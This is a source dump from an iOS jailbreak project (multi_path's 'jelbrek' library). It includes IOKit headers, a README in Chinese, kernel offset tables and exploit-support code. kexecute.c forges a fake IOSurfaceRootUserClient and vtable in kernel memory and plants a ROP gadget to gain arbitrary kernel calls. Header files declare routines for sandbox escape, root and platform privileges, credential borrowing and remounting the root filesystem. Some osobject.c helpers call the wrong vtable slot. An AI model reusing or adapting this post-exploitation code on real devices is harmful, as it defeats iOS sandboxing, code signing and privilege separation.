 67 |     
 68 |     kIOInterestCalloutFuncIndex	= kIOAsyncReservedCount,
 69 |     kIOInterestCalloutRefconIndex,
 70 |     kIOInterestCalloutServiceIndex,
 71 |     kIOInterestCalloutCount
 72 | };
 73 | 
 74 | enum {
 75 |     kOSAsyncRefCount	= 8,
 76 |     kOSAsyncRefSize 	= 32
 77 | };
 78 | typedef natural_t OSAsyncReference[kOSAsyncRefCount];
 79 | 
 80 | struct OSNotificationHeader {
 81 |     vm_size_t		size;		/* content size */
 82 |     natural_t		type;
 83 |     OSAsyncReference	reference;
 84 | 
 85 | #if defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901L)
 86 |     unsigned char	content[];
 87 | #else
 88 |     unsigned char	content[0];
 89 | #endif
 90 | };
 91 | 
 92 | struct IOServiceInterestContent {
 93 |     natural_t	messageType;
 94 |     void *	messageArgument[1];
 95 | };
 96 | 
 97 | struct IOAsyncCompletionContent {
 98 |     IOReturn result;
 99 | #if defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901L)
100 |     void * args[];
101 | #else
102 |     void * args[0];
103 | #endif
104 | };
105 | 
106 | #ifndef __cplusplus
107 | typedef struct OSNotificationHeader OSNotificationHeader;
108 | typedef struct IOServiceInterestContent IOServiceInterestContent;
109 | typedef struct IOAsyncCompletionContent IOAsyncCompletionContent;
110 | #endif
111 | 
112 | #ifdef __cplusplus
113 | }
114 | #endif
115 | 
116 | #endif /*  __OS_OSMESSAGENOTIFICATION_H */
117 | 
118 | 


--------------------------------------------------------------------------------
/multi_path/jelbrek/include/IOKit/Readme.md:
--------------------------------------------------------------------------------
 1 | IOKit for iOS SDK7.0
 2 | =======
 3 | 
 4 | ![](https://github.com/obaby/IOKit/blob/master/screenshot.jpg?raw=true)
 5 | 
 6 | 在某些时候可能会用到IOKit来获取一些信息，但是将sdk从6.x升级到7.0的sdk之后就会发现那个libIOKit.dylib找不到了。晚上的办法是将6.x的sdk复制到7.0的sdk下，或者创建一个符号链接。
 7 | 
 8 | 其实还有另外的一个解决办法，在7.0之后这个东西只是不是dylib了，而是成了一个framework。在这个目录下
 9 | 
10 |  /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS7.0.sdk/System/Library/Frameworks/IOKit.framework，所以只需要将工程中的iokit用framework替换掉就可以了。另外这个并没有头文件，如果要用也得自己去提取相关的头文件。可以用classdump来生成。我用的是apple xun中的头文件，效果是一样的，这里整理了一下，需要的直接放入工程目录下引入IOKitLib.h就可以了。


--------------------------------------------------------------------------------
/multi_path/jelbrek/include/IOKit/screenshot.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/jelbrek/include/IOKit/screenshot.jpg


--------------------------------------------------------------------------------
/multi_path/jelbrek/inject_criticald.h:
--------------------------------------------------------------------------------
1 | int inject_dylib(pid_t pid, char *loaded_dylib);
2 | uint64_t binary_load_address(mach_port_t tp);
3 | 


--------------------------------------------------------------------------------
/multi_path/jelbrek/jelbrek.h:
--------------------------------------------------------------------------------
 1 | #include "QiLin.h"
 2 | 
 3 | void init_jelbrek(mach_port_t tfp0, uint64_t kernel_base);
 4 | kern_return_t trust_bin(const char *path);
 5 | BOOL unsandbox(pid_t pid);
 6 | void setcsflags(pid_t pid);
 7 | BOOL get_root(pid_t pid);
 8 | void remount1126(void);
 9 | void mountDevAtPathAsRW(const char* devpath, const char* path);
10 | void remount1131(void);
11 | void platformize(pid_t pid);
12 | void entitlePid(pid_t pid, const char *ent1, _Bool val1);
13 | int launch(char *binary, char *arg1, char *arg2, char *arg3, char *arg4, char *arg5, char *arg6, char**env);
14 | int launchAsPlatform(char *binary, char *arg1, char *arg2, char *arg3, char *arg4, char *arg5, char *arg6, char**env);
15 | void undoCredDonation(uint64_t selfcred);
16 | uint64_t borrowCredsFromPid(pid_t donor);
17 | uint64_t borrowCredsFromDonor(char *binary);
18 | 
19 | 


--------------------------------------------------------------------------------
/multi_path/jelbrek/kern_utils.h:
--------------------------------------------------------------------------------
 1 | //
 2 | //  fun_utils.h
 3 | //  async_wake_ios
 4 | //
 5 | //  Created by George on 18/12/17.
 6 | //  Copyright © 2017 Ian Beer. All rights reserved.
 7 | //
 8 | 
 9 | #ifndef fun_utils_h
10 | #define fun_utils_h
11 | 
12 | #include <stdio.h>
13 | #include <mach-o/loader.h>
14 | #include <CommonCrypto/CommonDigest.h>
15 | #include <stdlib.h>
16 | #include <fcntl.h>
17 | #include <unistd.h>
18 | #include <errno.h>
19 | #include <mach/mach.h>
20 | #include <sys/stat.h>
21 | #include <sys/mount.h>
22 | 
23 | // Needed definitions
24 | kern_return_t mach_vm_allocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size, int flags);
25 | kern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize);
26 | kern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt);
27 | kern_return_t mach_vm_deallocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size);
28 | 
29 | // "General" purpose
30 | uint8_t *get_sha256(uint8_t* code_dir);
31 | uint8_t *get_code_directory(const char* name);
32 | int cp(const char *from, const char *to);
33 | int file_exist(char *filename);
34 | 
35 | // Kernel utility stuff
36 | void init_kernel_utils(mach_port_t tfp0);
37 | uint64_t kalloc(vm_size_t size);
38 | void kfree(mach_vm_address_t address, vm_size_t size);
39 | size_t kread(uint64_t where, void *p, size_t size);
40 | uint32_t kread32(uint64_t where);
41 | uint64_t kread64(uint64_t where);
42 | size_t kwrite(uint64_t where, const void *p, size_t size);
43 | void kwrite32(uint64_t where, uint32_t what);
44 | void kwrite64(uint64_t where, uint64_t what);
45 | void kmemcpy(uint64_t dest, uint64_t src, uint32_t length);
46 | mach_port_t fake_host_priv(void);
47 | uint64_t zm_fix_addr(uint64_t addr);
48 | uint64_t proc_for_pid(pid_t pid);
49 | uint64_t proc_for_name(char *nm);
50 | unsigned int pid_for_name(char *nm);
51 | uint64_t find_port_address(mach_port_name_t port);
52 | uint64_t task_self_addr(void);
53 | uint64_t kmem_alloc_wired(uint64_t size);
54 | uint64_t find_kernproc(void);
55 | uint64_t find_kernel_base(void);
56 | uint64_t getVnodeAtPath(const char *path);
57 | #endif /* fun_utils_h */
58 | 


--------------------------------------------------------------------------------
/multi_path/jelbrek/kexecute.c:
--------------------------------------------------------------------------------
  1 | 
  2 | #include <pthread.h>
  3 | #include "kern_utils.h"
  4 | #include "kexecute.h"
  5 | #include "patchfinder64.h"
  6 | #include "offsetof.h"
  7 | #include <IOKit/IOKitLib.h>
  8 | 
  9 | mach_port_t prepare_user_client(void) {
 10 |   kern_return_t err;
 11 |   mach_port_t user_client;
 12 |   io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOSurfaceRoot"));
 13 | 
 14 |   if (service == IO_OBJECT_NULL){
 15 |     printf(" [-] unable to find service\n");
 16 |     exit(EXIT_FAILURE);
 17 |   }
 18 | 
 19 |   err = IOServiceOpen(service, mach_task_self(), 0, &user_client);
 20 |   if (err != KERN_SUCCESS){
 21 |     printf(" [-] unable to get user client connection\n");
 22 |     exit(EXIT_FAILURE);
 23 |   }
 24 | 
 25 | 
 26 |   //
 27 |     printf("got user client: 0x%x\n", user_client);
 28 |   return user_client;
 29 | }
 30 | 
 31 | // TODO: Consider removing this - jailbreakd runs all kernel ops on the main thread
 32 | pthread_mutex_t kexecute_lock;
 33 | static mach_port_t user_client;
 34 | static uint64_t IOSurfaceRootUserClient_port;
 35 | static uint64_t IOSurfaceRootUserClient_addr;
 36 | static uint64_t fake_vtable;
 37 | static uint64_t fake_client;
 38 | const int fake_kalloc_size = 0x1000;
 39 | 
 40 | void init_kexecute(void) {
 41 |     user_client = prepare_user_client();
 42 | 
 43 |     // From v0rtex - get the IOSurfaceRootUserClient port, and then the address of the actual client, and vtable
 44 |     IOSurfaceRootUserClient_port = find_port_address(user_client); // UserClients are just mach_ports, so we find its address
 45 |     //
 46 |     printf("Found port: 0x%llx\n", IOSurfaceRootUserClient_port);
 47 | 
 48 |     IOSurfaceRootUserClient_addr = kread64(IOSurfaceRootUserClient_port + offsetof_ip_kobject); // The UserClient itself (the C++ object) is at the kobject field
 49 |     //
 50 |     printf("Found addr: 0x%llx\n", IOSurfaceRootUserClient_addr);
 51 | 
 52 |     uint64_t IOSurfaceRootUserClient_vtab = kread64(IOSurfaceRootUserClient_addr); // vtables in C++ are at *object
 53 |     //
 54 |     printf("Found vtab: 0x%llx\n", IOSurfaceRootUserClient_vtab);
 55 | 
 56 |     // The aim is to create a fake client, with a fake vtable, and overwrite the existing client with the fake one
 57 |     // Once we do that, we can use IOConnectTrap6 to call functions in the kernel as the kernel
 58 | 
 59 | 
 60 |     // Create the vtable in the kernel memory, then copy the existing vtable into there
 61 |     fake_vtable = kalloc(fake_kalloc_size);
 62 |     //
 63 |     printf("Created fake_vtable at %016llx\n", fake_vtable);
 64 | 
 65 |     for (int i = 0; i < 0x200; i++) {
 66 |         kwrite64(fake_vtable+i*8, kread64(IOSurfaceRootUserClient_vtab+i*8));
 67 |     }
 68 | 
 69 |     //
 70 |     printf("Copied some of the vtable over\n");
 71 | 
 72 |     // Create the fake user client
 73 |     fake_client = kalloc(fake_kalloc_size);
 74 |     //
 75 |     printf("Created fake_client at %016llx\n", fake_client);
 76 | 
 77 |     for (int i = 0; i < 0x200; i++) {
 78 |         kwrite64(fake_client+i*8, kread64(IOSurfaceRootUserClient_addr+i*8));
 79 |     }
 80 | 
 81 |     //
 82 |     printf("Copied the user client over\n");
 83 | 
 84 |     // Write our fake vtable into the fake user client
 85 |     kwrite64(fake_client, fake_vtable);
 86 | 
 87 |     // Replace the user client with ours
 88 |     kwrite64(IOSurfaceRootUserClient_port + offsetof_ip_kobject, fake_client);
 89 | 
 90 |     // Now the userclient port we have will look into our fake user client rather than the old one
 91 | 
 92 |     // Replace IOUserClient::getExternalTrapForIndex with our ROP gadget (add x0, x0, #0x40; ret;)
 93 |     kwrite64(fake_vtable+8*0xB7, find_add_x0_x0_0x40_ret());
 94 | 
 95 |     //
 96 |     printf("Wrote the `add x0, x0, #0x40; ret;` gadget over getExternalTrapForIndex");
 97 | 
 98 |     pthread_mutex_init(&kexecute_lock, NULL);
 99 | }
100 | 
101 | void term_kexecute(void) {
102 |     kwrite64(IOSurfaceRootUserClient_port + offsetof_ip_kobject, IOSurfaceRootUserClient_addr);
103 |     kfree(fake_vtable, fake_kalloc_size);
104 |     kfree(fake_client, fake_kalloc_size);
105 | }
106 | 
107 | uint64_t kexecute(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2, uint64_t x3, uint64_t x4, uint64_t x5, uint64_t x6) {
108 |     pthread_mutex_lock(&kexecute_lock);
109 | 
110 |     // When calling IOConnectTrapX, this makes a call to iokit_user_client_trap, which is the user->kernel call (MIG). This then calls IOUserClient::getTargetAndTrapForIndex
111 |     // to get the trap struct (which contains an object and the function pointer itself). This function calls IOUserClient::getExternalTrapForIndex, which is expected to return a trap.
112 |     // This jumps to our gadget, which returns +0x40 into our fake user_client, which we can modify. The function is then called on the object. But how C++ actually works is that the
113 |     // function is called with the first arguement being the object (referenced as `this`). Because of that, the first argument of any function we call is the object, and everything else is passed
114 |     // through like normal.
115 | 
116 |     // Because the gadget gets the trap at user_client+0x40, we have to overwrite the contents of it
117 |     // We will pull a switch when doing so - retrieve the current contents, call the trap, put back the contents
118 |     // (i'm not actually sure if the switch back is necessary but meh)
119 | 
120 |     uint64_t offx20 = kread64(fake_client+0x40);
121 |     uint64_t offx28 = kread64(fake_client+0x48);
122 |     kwrite64(fake_client+0x40, x0);
123 |     kwrite64(fake_client+0x48, addr);
124 |     uint64_t returnval = IOConnectTrap6(user_client, 0, (uint64_t)(x1), (uint64_t)(x2), (uint64_t)(x3), (uint64_t)(x4), (uint64_t)(x5), (uint64_t)(x6));
125 |     kwrite64(fake_client+0x40, offx20);
126 |     kwrite64(fake_client+0x48, offx28);
127 | 
128 |     pthread_mutex_unlock(&kexecute_lock);
129 | 
130 |     return returnval;
131 | }
132 | 


--------------------------------------------------------------------------------
/multi_path/jelbrek/kexecute.h:
--------------------------------------------------------------------------------
1 | #include <mach/mach.h>
2 | #include <inttypes.h>
3 | 
4 | uint64_t kexecute(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2, uint64_t x3, uint64_t x4, uint64_t x5, uint64_t x6);
5 | void init_kexecute(void);
6 | void term_kexecute(void);
7 | 


--------------------------------------------------------------------------------
/multi_path/jelbrek/libjb.h:
--------------------------------------------------------------------------------
 1 | #include <sys/time.h>
 2 | 
 3 | #ifndef libjb_h_included
 4 | #define libjb_h_included
 5 | 
 6 | 
 7 | 
 8 | /* libhfs *******************************************************************/
 9 | 
10 | enum {
11 |     kPermOtherExecute  = 1 << 0,
12 |     kPermOtherWrite    = 1 << 1,
13 |     kPermOtherRead     = 1 << 2,
14 |     kPermGroupExecute  = 1 << 3,
15 |     kPermGroupWrite    = 1 << 4,
16 |     kPermGroupRead     = 1 << 5,
17 |     kPermOwnerExecute  = 1 << 6,
18 |     kPermOwnerWrite    = 1 << 7,
19 |     kPermOwnerRead     = 1 << 8,
20 |     kPermMask          = 0x1FF,
21 |     kOwnerNotRoot      = 1 << 9,
22 |     kFileTypeUnknown   = 0x0 << 16,
23 |     kFileTypeFlat      = 0x1 << 16,
24 |     kFileTypeDirectory = 0x2 << 16,
25 |     kFileTypeLink      = 0x3 << 16,
26 |     kFileTypeMask      = 0x3 << 16
27 | };
28 | 
29 | typedef long CICell;
30 | 
31 | extern char *gLoadAddr; /* buffer of size 32MB (max file size) */
32 | 
33 | CICell HFSOpen(const char *filename, long offset);
34 | long HFSReadFile(CICell ih, char *filePath, void *base, unsigned long offset, unsigned long length);
35 | long HFSGetDirEntry(CICell ih, char *dirPath, unsigned long *dirIndex, char **name, long *flags, long *time);
36 | void HFSClose(CICell);
37 | 
38 | /* untar ********************************************************************/
39 | 
40 | /* untar 'a' to current directory.  path is name of archive (informational) */
41 | void untar(FILE *a, const char *path);
42 | 
43 | /* launchctl ****************************************************************/
44 | 
45 | int launchctl_load_cmd(const char *filename, int do_load, int opt_force, int opt_write);
46 | 
47 | /* hashes *******************************************************************/
48 | 
49 | struct trust_dsk {
50 |     unsigned int version;
51 |     unsigned char uuid[16];
52 |     unsigned int count;
53 |     //unsigned char data[];
54 | } __attribute__((packed));
55 | 
56 | struct trust_mem {
57 |     uint64_t next; //struct trust_mem *next;
58 |     unsigned char uuid[16];
59 |     unsigned int count;
60 |     //unsigned char data[];
61 | } __attribute__((packed));
62 | 
63 | struct hash_entry_t {
64 |     uint16_t num;
65 |     uint16_t start;
66 | } __attribute__((packed));
67 | 
68 | typedef uint8_t hash_t[20];
69 | 
70 | extern hash_t *allhash;
71 | extern unsigned numhash;
72 | extern struct hash_entry_t *amfitab;
73 | extern hash_t *allkern;
74 | 
75 | /* can be called multiple times. kernel read func & amfi/top trust chain block are optional */
76 | int grab_hashes(const char *root, size_t (*kread)(uint64_t, void *, size_t), uint64_t amfi, uint64_t top);
77 | 
78 | #endif
79 | 


--------------------------------------------------------------------------------
/multi_path/jelbrek/offsetof.c:
--------------------------------------------------------------------------------
 1 | unsigned offsetof_p_pid = 0x10;               // proc_t::p_pid
 2 | unsigned offsetof_task = 0x18;                // proc_t::task
 3 | unsigned offsetof_p_uid = 0x30;               // proc_t::p_uid
 4 | unsigned offsetof_p_gid = 0x34;               // proc_t::p_uid
 5 | unsigned offsetof_p_ruid = 0x38;              // proc_t::p_uid
 6 | unsigned offsetof_p_rgid = 0x3c;              // proc_t::p_uid
 7 | unsigned offsetof_p_ucred = 0x100;            // proc_t::p_ucred
 8 | unsigned offsetof_p_csflags = 0x2a8;          // proc_t::p_csflags
 9 | unsigned offsetof_itk_self = 0xD8;            // task_t::itk_self (convert_task_to_port)
10 | unsigned offsetof_itk_sself = 0xE8;           // task_t::itk_sself (task_get_special_port)
11 | unsigned offsetof_itk_bootstrap = 0x2b8;      // task_t::itk_bootstrap (task_get_special_port)
12 | unsigned offsetof_itk_space = 0x308;          // task_t::itk_space
13 | unsigned offsetof_ip_mscount = 0x9C;          // ipc_port_t::ip_mscount (ipc_port_make_send)
14 | unsigned offsetof_ip_srights = 0xA0;          // ipc_port_t::ip_srights (ipc_port_make_send)
15 | unsigned offsetof_ip_kobject = 0x68;          // ipc_port_t::ip_kobject
16 | unsigned offsetof_p_textvp = 0x248;           // proc_t::p_textvp
17 | unsigned offsetof_p_textoff = 0x250;          // proc_t::p_textoff
18 | unsigned offsetof_p_cputype = 0x2c0;          // proc_t::p_cputype
19 | unsigned offsetof_p_cpu_subtype = 0x2c4;      // proc_t::p_cpu_subtype
20 | unsigned offsetof_special = 2 * sizeof(long); // host::special
21 | unsigned offsetof_ipc_space_is_table = 0x20;  // ipc_space::is_table?..
22 | 
23 | unsigned offsetof_ucred_cr_uid = 0x18;        // ucred::cr_uid
24 | unsigned offsetof_ucred_cr_ruid = 0x1c;       // ucred::cr_ruid
25 | unsigned offsetof_ucred_cr_svuid = 0x20;      // ucred::cr_svuid
26 | unsigned offsetof_ucred_cr_ngroups = 0x24;    // ucred::cr_ngroups
27 | unsigned offsetof_ucred_cr_groups = 0x28;     // ucred::cr_groups
28 | unsigned offsetof_ucred_cr_rgid = 0x68;       // ucred::cr_rgid
29 | unsigned offsetof_ucred_cr_svgid = 0x6c;      // ucred::cr_svgid
30 | 
31 | unsigned offsetof_v_type = 0x70;              // vnode::v_type
32 | unsigned offsetof_v_id = 0x74;                // vnode::v_id
33 | unsigned offsetof_v_ubcinfo = 0x78;           // vnode::v_ubcinfo
34 | 
35 | unsigned offsetof_ubcinfo_csblobs = 0x50;     // ubc_info::csblobs
36 | 
37 | unsigned offsetof_csb_cputype = 0x8;          // cs_blob::csb_cputype
38 | unsigned offsetof_csb_flags = 0x12;           // cs_blob::csb_flags
39 | unsigned offsetof_csb_base_offset = 0x16;     // cs_blob::csb_base_offset
40 | unsigned offsetof_csb_entitlements_offset = 0x98; // cs_blob::csb_entitlements
41 | unsigned offsetof_csb_signer_type = 0xA0;     // cs_blob::csb_signer_type
42 | unsigned offsetof_csb_platform_binary = 0xA4; // cs_blob::csb_platform_binary
43 | unsigned offsetof_csb_platform_path = 0xA8;   // cs_blob::csb_platform_path
44 | 
45 | unsigned offsetof_t_flags = 0x3a0; // task::t_flags
46 | 
47 | unsigned offsetof_v_mount = 0xd8;             // vnode::v_mount
48 | unsigned offsetof_v_specinfo = 0x78;          // vnode::v_specinfo
49 | unsigned offsetof_specflags = 0x10;
50 | unsigned offsetof_mnt_flag = 0x70;            // mount::mnt_flag
51 | unsigned offsetof_mnt_data = 0x8f8;           // mount::mnt_data
52 | 
53 | 


--------------------------------------------------------------------------------
/multi_path/jelbrek/offsetof.h:
--------------------------------------------------------------------------------
 1 | 
 2 | extern unsigned offsetof_p_pid;
 3 | extern unsigned offsetof_task;
 4 | extern unsigned offsetof_p_uid;
 5 | extern unsigned offsetof_p_gid;
 6 | extern unsigned offsetof_p_ruid;
 7 | extern unsigned offsetof_p_rgid;
 8 | extern unsigned offsetof_p_ucred;
 9 | extern unsigned offsetof_p_csflags;
10 | extern unsigned offsetof_itk_self;
11 | extern unsigned offsetof_itk_sself;
12 | extern unsigned offsetof_itk_bootstrap;
13 | extern unsigned offsetof_itk_space;
14 | extern unsigned offsetof_ip_mscount;
15 | extern unsigned offsetof_ip_srights;
16 | extern unsigned offsetof_ip_kobject;
17 | extern unsigned offsetof_p_textvp;
18 | extern unsigned offsetof_p_textoff;
19 | extern unsigned offsetof_p_cputype;
20 | extern unsigned offsetof_p_cpu_subtype;
21 | extern unsigned offsetof_special;
22 | extern unsigned offsetof_ipc_space_is_table;
23 | 
24 | extern unsigned offsetof_ucred_cr_uid;
25 | extern unsigned offsetof_ucred_cr_ruid;
26 | extern unsigned offsetof_ucred_cr_gid;
27 | extern unsigned offsetof_ucred_cr_rgid;
28 | extern unsigned offsetof_ucred_cr_svgid;
29 | extern unsigned offsetof_ucred_cr_groups;
30 | extern unsigned offsetof_ucred_cr_ngroups;
31 | extern unsigned offsetof_ucred_cr_svuid;
32 | 
33 | extern unsigned offsetof_v_type;
34 | extern unsigned offsetof_v_id;
35 | extern unsigned offsetof_v_ubcinfo;
36 | 
37 | extern unsigned offsetof_ubcinfo_csblobs;
38 | 
39 | extern unsigned offsetof_csb_cputype;
40 | extern unsigned offsetof_csb_flags;
41 | extern unsigned offsetof_csb_base_offset;
42 | extern unsigned offsetof_csb_entitlements_offset;
43 | extern unsigned offsetof_csb_signer_type;
44 | extern unsigned offsetof_csb_platform_binary;
45 | extern unsigned offsetof_csb_platform_path;
46 | 
47 | extern unsigned offsetof_t_flags;
48 | 
49 | extern unsigned offsetof_v_mount;
50 | extern unsigned offsetof_v_specinfo;
51 | extern unsigned offsetof_specflags;
52 | extern unsigned offsetof_mnt_flag;
53 | extern unsigned offsetof_mnt_data;
54 | 
55 | #define	CS_VALID		0x0000001	/* dynamically valid */
56 | #define CS_ADHOC		0x0000002	/* ad hoc signed */
57 | #define CS_GET_TASK_ALLOW	0x0000004	/* has get-task-allow entitlement */
58 | #define CS_INSTALLER		0x0000008	/* has installer entitlement */
59 | 
60 | #define	CS_HARD			0x0000100	/* don't load invalid pages */
61 | #define	CS_KILL			0x0000200	/* kill process if it becomes invalid */
62 | #define CS_CHECK_EXPIRATION	0x0000400	/* force expiration checking */
63 | #define CS_RESTRICT		0x0000800	/* tell dyld to treat restricted */
64 | #define CS_ENFORCEMENT		0x0001000	/* require enforcement */
65 | #define CS_REQUIRE_LV		0x0002000	/* require library validation */
66 | #define CS_ENTITLEMENTS_VALIDATED	0x0004000
67 | 
68 | #define	CS_ALLOWED_MACHO	0x00ffffe
69 | 
70 | #define CS_EXEC_SET_HARD	0x0100000	/* set CS_HARD on any exec'ed process */
71 | #define CS_EXEC_SET_KILL	0x0200000	/* set CS_KILL on any exec'ed process */
72 | #define CS_EXEC_SET_ENFORCEMENT	0x0400000	/* set CS_ENFORCEMENT on any exec'ed process */
73 | #define CS_EXEC_SET_INSTALLER	0x0800000	/* set CS_INSTALLER on any exec'ed process */
74 | 
75 | #define CS_KILLED		0x1000000	/* was killed by kernel for invalidity */
76 | #define CS_DYLD_PLATFORM	0x2000000	/* dyld used to load this is a platform binary */
77 | #define CS_PLATFORM_BINARY	0x4000000	/* this is a platform binary */
78 | #define CS_PLATFORM_PATH	0x8000000	/* platform binary by the fact of path (osx only) */
79 | 
80 | #define CS_DEBUGGED         0x10000000  /* process is currently or has previously been debugged and allowed to run with invalid pages */
81 | #define CS_SIGNED         0x20000000  /* process has a signature (may have gone invalid) */
82 | #define CS_DEV_CODE         0x40000000  /* code is dev signed, cannot be loaded into prod signed code (will go away with rdar://problem/28322552) */
83 | 
84 | 


--------------------------------------------------------------------------------
/multi_path/jelbrek/osobject.c:
--------------------------------------------------------------------------------
  1 | #include <stdlib.h>
  2 | #include "kexecute.h"
  3 | #include "kmem.h"
  4 | #include "kern_utils.h"
  5 | #include "patchfinder64.h"
  6 | #include "osobject.h"
  7 | 
  8 | // offsets in vtable:
  9 | static uint32_t off_OSDictionary_SetObjectWithCharP = sizeof(void*) * 0x1F;
 10 | static uint32_t off_OSDictionary_GetObjectWithCharP = sizeof(void*) * 0x26;
 11 | static uint32_t off_OSDictionary_Merge              = sizeof(void*) * 0x23;
 12 | 
 13 | static uint32_t off_OSArray_Merge                   = sizeof(void*) * 0x1E;
 14 | static uint32_t off_OSArray_RemoveObject            = sizeof(void*) * 0x20;
 15 | static uint32_t off_OSArray_GetObject               = sizeof(void*) * 0x22;
 16 | 
 17 | static uint32_t off_OSObject_Release                = sizeof(void*) * 0x05;
 18 | static uint32_t off_OSObject_GetRetainCount         = sizeof(void*) * 0x03;
 19 | static uint32_t off_OSObject_Retain                 = sizeof(void*) * 0x04;
 20 | 
 21 | static uint32_t off_OSString_GetLength              = sizeof(void*) * 0x11;
 22 | 
 23 | // 1 on success, 0 on error
 24 | int OSDictionary_SetItem(uint64_t dict, const char *key, uint64_t val) {
 25 |     size_t len = strlen(key) + 1;
 26 |     
 27 |     uint64_t ks = kalloc(len);
 28 |     kwrite(ks, key, len);
 29 |     
 30 |     uint64_t vtab = rk64(dict);
 31 |     uint64_t f = rk64(vtab + off_OSDictionary_SetObjectWithCharP);
 32 |     
 33 |     int rv = (int) kexecute(f, dict, ks, val, 0, 0, 0, 0);
 34 |     
 35 |     kfree(ks, len);
 36 |     
 37 |     return rv;
 38 | }
 39 | 
 40 | // XXX it can return 0 in lower 32 bits but still be valid
 41 | // fix addr of returned value and check if rk64 gives ptr
 42 | // to vtable addr saved before
 43 | 
 44 | // address if exists, 0 if not
 45 | uint64_t _OSDictionary_GetItem(uint64_t dict, const char *key) {
 46 |     size_t len = strlen(key) + 1;
 47 |     
 48 |     uint64_t ks = kalloc(len);
 49 |     kwrite(ks, key, len);
 50 |     
 51 |     uint64_t vtab = rk64(dict);
 52 |     uint64_t f = rk64(vtab + off_OSDictionary_GetObjectWithCharP);
 53 |     
 54 |     int rv = (int) kexecute(f, dict, ks, 0, 0, 0, 0, 0);
 55 |     
 56 |     kfree(ks, len);
 57 |     
 58 |     return rv;
 59 | }
 60 | 
 61 | uint64_t OSDictionary_GetItem(uint64_t dict, const char *key) {
 62 |     uint64_t ret = _OSDictionary_GetItem(dict, key);
 63 |     
 64 |     if (ret != 0) {
 65 |         // XXX can it be not in zalloc?..
 66 |         ret = zm_fix_addr(ret);
 67 |     }
 68 |     
 69 |     return ret;
 70 | }
 71 | 
 72 | // 1 on success, 0 on error
 73 | int OSDictionary_Merge(uint64_t dict, uint64_t aDict) {
 74 |     uint64_t vtab = rk64(dict);
 75 |     uint64_t f = rk64(vtab + off_OSDictionary_Merge);
 76 |     
 77 |     return (int) kexecute(f, dict, aDict, 0, 0, 0, 0, 0);
 78 | }
 79 | 
 80 | // 1 on success, 0 on error
 81 | int OSArray_Merge(uint64_t array, uint64_t aArray) {
 82 |     uint64_t vtab = rk64(array);
 83 |     uint64_t f = rk64(vtab + off_OSArray_Merge);
 84 |     
 85 |     return (int) kexecute(f, array, aArray, 0, 0, 0, 0, 0);
 86 | }
 87 | 
 88 | uint64_t _OSArray_GetObject(uint64_t array, unsigned int idx){
 89 |     uint64_t vtab = rk64(array);
 90 |     uint64_t f = rk64(vtab + off_OSArray_GetObject);
 91 |     
 92 |     return kexecute(f, array, idx, 0, 0, 0, 0, 0);
 93 | }
 94 | 
 95 | uint64_t OSArray_GetObject(uint64_t array, unsigned int idx){
 96 |     uint64_t ret = _OSArray_GetObject(array, idx);
 97 |     
 98 |     if (ret != 0){
 99 |         // XXX can it be not in zalloc?..
100 |         ret = zm_fix_addr(ret);
101 |     }
102 |     return ret;
103 | }
104 | 
105 | void OSArray_RemoveObject(uint64_t array, unsigned int idx){
106 |     uint64_t vtab = rk64(array);
107 |     uint64_t f = rk64(vtab + off_OSArray_RemoveObject);
108 |     
109 |     (void)kexecute(f, array, idx, 0, 0, 0, 0, 0);
110 | }
111 | 
112 | // XXX error handling just for fun? :)
113 | uint64_t _OSUnserializeXML(const char* buffer) {
114 |     size_t len = strlen(buffer) + 1;
115 |     
116 |     uint64_t ks = kalloc(len);
117 |     kwrite(ks, buffer, len);
118 |     
119 |     uint64_t errorptr = 0;
120 |     
121 |     uint64_t rv = kexecute(find_osunserializexml(), ks, errorptr, 0, 0, 0, 0, 0);
122 |     kfree(ks, len);
123 |     
124 |     return rv;
125 | }
126 | 
127 | uint64_t OSUnserializeXML(const char* buffer) {
128 |     uint64_t ret = _OSUnserializeXML(buffer);
129 |     
130 |     if (ret != 0) {
131 |         // XXX can it be not in zalloc?..
132 |         ret = zm_fix_addr(ret);
133 |     }
134 |     
135 |     return ret;
136 | }
137 | 
138 | void OSObject_Release(uint64_t osobject) {
139 |     uint64_t vtab = rk64(osobject);
140 |     uint64_t f = rk64(vtab + off_OSObject_Release);
141 |     (void) kexecute(f, osobject, 0, 0, 0, 0, 0, 0);
142 | }
143 | 
144 | void OSObject_Retain(uint64_t osobject) {
145 |     uint64_t vtab = rk64(osobject);
146 |     uint64_t f = rk64(vtab + off_OSObject_Release);
147 |     (void) kexecute(f, osobject, 0, 0, 0, 0, 0, 0);
148 | }
149 | 
150 | uint32_t OSObject_GetRetainCount(uint64_t osobject) {
151 |     uint64_t vtab = rk64(osobject);
152 |     uint64_t f = rk64(vtab + off_OSObject_Release);
153 |     return (uint32_t) kexecute(f, osobject, 0, 0, 0, 0, 0, 0);
154 | }
155 | 
156 | unsigned int OSString_GetLength(uint64_t osstring){
157 |     uint64_t vtab = rk64(osstring);
158 |     uint64_t f = rk64(vtab + off_OSString_GetLength);
159 |     return (unsigned int)kexecute(f, osstring, 0, 0, 0, 0, 0, 0);
160 | }
161 | 
162 | char *OSString_CopyString(uint64_t osstring){
163 |     unsigned int length = OSString_GetLength(osstring);
164 |     char *str = malloc(length + 1);
165 |     str[length] = 0;
166 |     
167 |     kread(OSString_CStringPtr(osstring), str, length);
168 |     return str;
169 | }
170 | 


--------------------------------------------------------------------------------
/multi_path/jelbrek/osobject.h:
--------------------------------------------------------------------------------
 1 | #define OSDictionary_ItemCount(dict) kread32(dict+20)
 2 | #define OSDictionary_ItemBuffer(dict) kread64(dict+32)
 3 | #define OSDictionary_ItemKey(buffer, idx) kread64(buffer+16*idx)
 4 | #define OSDictionary_ItemValue(buffer, idx) kread64(buffer+16*idx+8)
